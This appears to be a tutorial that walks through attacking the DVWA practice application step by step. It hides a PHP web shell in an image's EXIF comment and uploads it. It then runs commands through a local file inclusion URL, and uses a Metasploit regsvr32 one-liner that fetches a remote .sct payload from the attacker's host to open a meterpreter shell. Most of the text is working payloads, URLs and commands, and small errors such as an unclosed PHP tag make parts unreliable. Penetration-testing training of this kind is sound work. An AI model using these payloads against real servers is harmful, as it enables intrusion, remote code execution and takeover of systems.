Web Server Exploitation with LFI and File Upload

In this article you will learn how to bypass file uploading vulnerability in high security through FILE INCLUSION vulnerability. As well as how to bypass local file inclusion to get reverse connection of victim’s Pc.

Attacker: kali Linux

Target: DVWA

 First you need to download Exif Piot tool from here. This is a GUI tool for windows users which allow adding exif data and Meta data inside a JPEG, PNG and GIF images.

Now open exif pilot and insert any image to hide malicious comment inside it; from screenshot you can see I have choose shell.png image and then click on EDIT EXIF/IPTC.

Further inside comment text field type <?php system($_GET[‘c’]); ? as malicious code and click on ok.

Here the exif data has been edited successfully inside the image. This tool replaces the malicious image from the original image in the same folder and sent the original image into recycle bin.

Now explore target IP in browser and login into DVWA with admin: password as credential. Set security level high.

Choose vulnerability file upload to upload the malicious image in the web server application and now browse your malicious image shell.png then click on upload.

It will show the path of uploaded image copy the highlighted path.

Now open the copied path in browser where you will find the uploaded image.

In order to execute the malicious code we need to change the category of vulnerability as well as security level also so that we can execute the hidden comment inside the image.

Now set security level low.

In order to bypass file uploading vulnerability in high security of DVWA we need to set other vulnerability and I have select File Inclusion for this purpose.

File Inclusion allow users to execute any file through URL as I have described above.

Now past the above copied path of uploaded image inside the URL as shown in screenshot.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png

 Here it has given warning system (): cannot execute blank command which means we need to add some command for execution hence through URL we will be able to execute any command.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=ifconfig

Here I try to check network configuration of victim’s Pc and you can see the result of network configuration from screenshot.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=dir

Here you can view the directories which I have got by executing dir command in URL.

Now next I will try to achieve meterpreter session using Kali Linux

Type msfconsole and load metasploit framework.

use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103

msf exploit(regsvr32_applocker_bypass_server) > set lport 1234

msf exploit(regsvr32_applocker_bypass_server) > exploit

regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll

Copy the above malicious code and send it to victim.

Here paste above .dll malicious code inside the URL and when you will run the code in the browser; attack will get victim’s meterpreter session on his kali Linux.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll

Meterpreter session 1 will get open

Meterpreter>sysinfo